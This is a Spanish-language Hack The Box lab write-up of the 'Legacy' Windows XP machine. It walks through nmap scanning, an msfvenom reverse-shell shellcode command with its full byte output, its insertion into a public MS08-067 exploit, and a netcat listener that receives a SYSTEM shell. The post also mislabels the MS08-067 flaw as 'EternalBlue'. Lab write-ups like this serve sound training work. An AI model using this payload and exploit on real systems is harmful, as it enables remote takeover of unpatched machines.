Legacy - Hack The Box - ESP
DESCRIPCION
En este post veremos como explotar la máquina Legacy usando el EternalBlue CVE-2008-4250. Tiene parecido a la máquina anterior Blue, pero tocaremos algún otro concepto como la creación de un shellcode con msfvenom y no usaremos el zzz_exploit.py.
INDICE
- Reconocimiento de puertos
- Explotación con EternalBlue
- Flags
- Conocimientos obtenidos
- Errores
- Autores y referencias
ESCANEO DE PUERTOS
Escaneamos con nmap
los puertos abiertos en la máquina Legacy:
❯ cat Puertos
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: Puertos
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nmap --open -p- -T5 -oG Puertos 10.10.10.4
2 │ Host: 10.10.10.4 () Status: Up
3 │ Host: 10.10.10.4 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
❯ Reconocimiento Puertos
{*} Extrayendo puertos...
La direccion ip es: 10.10.10.4
Los puertos abiertos son: 135,139,445
Los puertos han sido copiados al portapapeles
Escaneamos el objetivo con los scripts predeterminados de nmap apuntando a los puertos abiertos en busca de más información.
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: Objetivos
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nmap -sCV -p 135,139,445 -oN Objetivos 10.10.10.4
2 │ Nmap scan report for 10.10.10.4
3 │ Host is up (0.045s latency).
4 │
5 │ PORT STATE SERVICE VERSION
6 │ 135/tcp open msrpc Microsoft Windows RPC
7 │ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
8 │ 445/tcp open microsoft-ds Windows XP microsoft-ds
9 │ Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
10 │
11 │ Host script results:
12 │ |_smb2-time: Protocol negotiation failed (SMB2)
13 │ |_clock-skew: mean: 5d00h27m40s, deviation: 2h07m16s, median: 4d22h57m40s
14 │ |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:35:28 (VMware)
15 │ | smb-security-mode:
16 │ | account_used: <blank>
17 │ | authentication_level: user
18 │ | challenge_response: supported
19 │ |_ message_signing: disabled (dangerous, but default)
20 │ | smb-os-discovery:
21 │ | OS: Windows XP (Windows 2000 LAN Manager)
22 │ | OS CPE: cpe:/o:microsoft:windows_xp::-
23 │ | Computer name: legacy
24 │ | NetBIOS computer name: LEGACY\x00
25 │ | Workgroup: HTB\x00
26 │ |_ System time: 2022-07-18T19:51:37+03:00
│
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Vemos que el SO que corre en la máquina es Windows XP
en este momento ya tenemos que pensar en el famoso EternalBlue
o en alguna de sus variantes.
Podemos comprobar con nmap si el equipo tiene alguna vulnerabilidad con el siguiente parámetro --script vuln
, en este caso lo más seguro es que nos reporte vulnerabilidades
para el smb como el EternalBlue.
❯ nmap --script vuln -p 135,139,445 10.10.10.4 -oN Vulnschecker
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-11 05:05 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.044s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143https://www.hackthebox.com/storage/avatars/60dc190c4c015cfe3a3aef9b5afca254.png
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
Vemos que es vulnerable y tenemos dos opciones smb-vuln-ms17-010 & smb-vuln-ms08-067
. Nos decantaremos por la última, ya que en la máquina Blue
usamos la primera.
EXPLOTACION CON ETERNALBLUE
REPOSITORIO
Tenemos un repositorio de github donde se nos facilita un script en python para explotar esta vulnerabilidad CVE-2008-4250
.
CREACION DEL SHELLCODE MSFVENOM
Vamos a generar un shellcode con msfvenom
.
❯ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.5 LPORT=1234 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1488 bytes
unsigned char buf[] =
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x6f\x88\xb5\xee\x83\xee\xfc\xe2\xf4\x93\x60\x37\xee\x6f\x88"
"\xd5\x67\x8a\xb9\x75\x8a\xe4\xd8\x85\x65\x3d\x84\x3e\xbc\x7b"
"\x03\xc7\xc6\x60\x3f\xff\xc8\x5e\x77\x19\xd2\x0e\xf4\xb7\xc2"
"\x4f\x49\x7a\xe3\x6e\x4f\x57\x1c\x3d\xdf\x3e\xbc\x7f\x03\xff"
"\xd2\xe4\xc4\xa4\x96\x8c\xc0\xb4\x3f\x3e\x03\xec\xce\x6e\x5b"
"\x3e\xa7\x77\x6b\x8f\xa7\xe4\xbc\x3e\xef\xb9\xb9\x4a\x42\xae"
"\x47\xb8\xef\xa8\xb0\x55\x9b\x99\x8b\xc8\x16\x54\xf5\x91\x9b"
"\x8b\xd0\x3e\xb6\x4b\x89\x66\x88\xe4\x84\xfe\x65\x37\x94\xb4"
"\x3d\xe4\x8c\x3e\xef\xbf\x01\xf1\xca\x4b\xd3\xee\x8f\x36\xd2"
"\xe4\x11\x8f\xd7\xea\xb4\xe4\x9a\x5e\x63\x32\xe0\x86\xdc\x6f"
"\x88\xdd\x99\x1c\xba\xea\xba\x07\xc4\xc2\xc8\x68\x77\x60\x56"
"\xff\x89\xb5\xee\x46\x4c\xe1\xbe\x07\xa1\x35\x85\x6f\x77\x60"
"\xbe\x3f\xd8\xe5\xae\x3f\xc8\xe5\x86\x85\x87\x6a\x0e\x90\x5d"
"\x22\x84\x6a\xe0\xbf\xe4\x7f\x8d\xdd\xec\x6f\x8c\x67\x67\x89"
"\xe2\xa5\xb8\x38\xe0\x2c\x4b\x1b\xe9\x4a\x3b\xea\x48\xc1\xe2"
"\x90\xc6\xbd\x9b\x83\xe0\x45\x5b\xcd\xde\x4a\x3b\x07\xeb\xd8"
"\x8a\x6f\x01\x56\xb9\x38\xdf\x84\x18\x05\x9a\xec\xb8\x8d\x75"
"\xd3\x29\x2b\xac\x89\xef\x6e\x05\xf1\xca\x7f\x4e\xb5\xaa\x3b"
"\xd8\xe3\xb8\x39\xce\xe3\xa0\x39\xde\xe6\xb8\x07\xf1\x79\xd1"
"\xe9\x77\x60\x67\x8f\xc6\xe3\xa8\x90\xb8\xdd\xe6\xe8\x95\xd5"
"\x11\xba\x33\x55\xf3\x45\x82\xdd\x48\xfa\x35\x28\x11\xba\xb4"
"\xb3\x92\x65\x08\x4e\x0e\x1a\x8d\x0e\xa9\x7c\xfa\xda\x84\x6f"
"\xdb\x4a\x3b"
MODIFICACION DEL SCRIPT
Antes de hacer uso del exploit vamos a modificar el script ms08_067_2018.py
con el shellcode para definir la reverse shell.
shellcode=(
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x6f\x88\xb5\xee\x83\xee\xfc\xe2\xf4\x93\x60\x37\xee\x6f\x88"
"\xd5\x67\x8a\xb9\x75\x8a\xe4\xd8\x85\x65\x3d\x84\x3e\xbc\x7b"
"\x03\xc7\xc6\x60\x3f\xff\xc8\x5e\x77\x19\xd2\x0e\xf4\xb7\xc2"
"\x4f\x49\x7a\xe3\x6e\x4f\x57\x1c\x3d\xdf\x3e\xbc\x7f\x03\xff"
"\xd2\xe4\xc4\xa4\x96\x8c\xc0\xb4\x3f\x3e\x03\xec\xce\x6e\x5b"
"\x3e\xa7\x77\x6b\x8f\xa7\xe4\xbc\x3e\xef\xb9\xb9\x4a\x42\xae"
"\x47\xb8\xef\xa8\xb0\x55\x9b\x99\x8b\xc8\x16\x54\xf5\x91\x9b"
"\x8b\xd0\x3e\xb6\x4b\x89\x66\x88\xe4\x84\xfe\x65\x37\x94\xb4"
"\x3d\xe4\x8c\x3e\xef\xbf\x01\xf1\xca\x4b\xd3\xee\x8f\x36\xd2"
"\xe4\x11\x8f\xd7\xea\xb4\xe4\x9a\x5e\x63\x32\xe0\x86\xdc\x6f"
"\x88\xdd\x99\x1c\xba\xea\xba\x07\xc4\xc2\xc8\x68\x77\x60\x56"
"\xff\x89\xb5\xee\x46\x4c\xe1\xbe\x07\xa1\x35\x85\x6f\x77\x60"
"\xbe\x3f\xd8\xe5\xae\x3f\xc8\xe5\x86\x85\x87\x6a\x0e\x90\x5d"
"\x22\x84\x6a\xe0\xbf\xe4\x7f\x8d\xdd\xec\x6f\x8c\x67\x67\x89"
"\xe2\xa5\xb8\x38\xe0\x2c\x4b\x1b\xe9\x4a\x3b\xea\x48\xc1\xe2"
"\x90\xc6\xbd\x9b\x83\xe0\x45\x5b\xcd\xde\x4a\x3b\x07\xeb\xd8"
"\x8a\x6f\x01\x56\xb9\x38\xdf\x84\x18\x05\x9a\xec\xb8\x8d\x75"
"\xd3\x29\x2b\xac\x89\xef\x6e\x05\xf1\xca\x7f\x4e\xb5\xaa\x3b"
"\xd8\xe3\xb8\x39\xce\xe3\xa0\x39\xde\xe6\xb8\x07\xf1\x79\xd1"
"\xe9\x77\x60\x67\x8f\xc6\xe3\xa8\x90\xb8\xdd\xe6\xe8\x95\xd5"
"\x11\xba\x33\x55\xf3\x45\x82\xdd\x48\xfa\x35\x28\x11\xba\xb4"
"\xb3\x92\x65\x08\x4e\x0e\x1a\x8d\x0e\xa9\x7c\xfa\xda\x84\x6f"
"\xdb\x4a\x3b"
)
OBTENCION DE LA REVERSE SHELL
1- Nos ponemos por escucha con nc y usando rlwrap
para obtener una consola más interactiva.
rlwrap nc -lvnp 1234
2- Comprobamos el uso del script.
❯ python ms08_067_2018.py
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer:
# - Added support for selecting a target port at the command line.
# It seemed that only 445 was previously supported.
# - Changed library calls to correctly establish a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode. Just cut and paste
# into this source file.
#######################################################################
Usage: ms08_067_2018.py <target ip> <os #> <Port #>
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
3- Ejecutamos el script, pasándole los parámetros correspondientes, en este caso el os=6
y port=445
.
❯ python2 ms08_067_2018.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer:
# - Added support for selecting a target port at the command line.
# It seemed that only 445 was previously supported.
# - Changed library calls to correctly establish a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode. Just cut and paste
# into this source file.
#######################################################################
Windows XP SP3 English (NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
4- Comprobamos la correcta obtención de la reverse shell.
❯ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.4] 1032
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
5- ¡Somos nt authority\system! Perfecto ya podemos visualizar las flags.
FLAGS
User.txt
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 <DIR> .
16/03/2017 09:19 <DIR> ..
16/03/2017 09:19 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.342.369.280 bytes free
type user.txt
e69axxxxxxxxxxxxxxxxxxxxxxxxxxxx
Root.txt
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 09:18 <DIR> .
16/03/2017 09:18 <DIR> ..
16/03/2017 09:18 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.342.385.664 bytes free
type root.txt
9934xxxxxxxxxxxxxxxxxxxxxxxxxxxx
CONOCIMIENTOS OBTENIDOS
De la máquina Legacy podemos extraer los siguientes conocimientos:
- Reconocimiento de puertos con Nmap.
- Comprobar vulnerabilidades explotables con Nmap.
- Crear un shellcode con msfvenom el cual entable una reverse shell.
- Explotar smb con EternalBlue.
ERRORES
Un posible error que podéis sufrir es el siguiente:
- Al ejecutar el script puede crashear la máquina, por lo que tendrías que reiniciarla y volver a ejecutarlo.
AUTORES y REFERENCIAS
Autor del write up: Luis Miranda Sierra (Void4m0n) HTB. Si queréis contactarme por cualquier motivo lo podéis hacer a través de Twitter.
Autor de la máquina: ch4p, muchas gracias por la creación de Legacy aportando a la comunidad. HTB.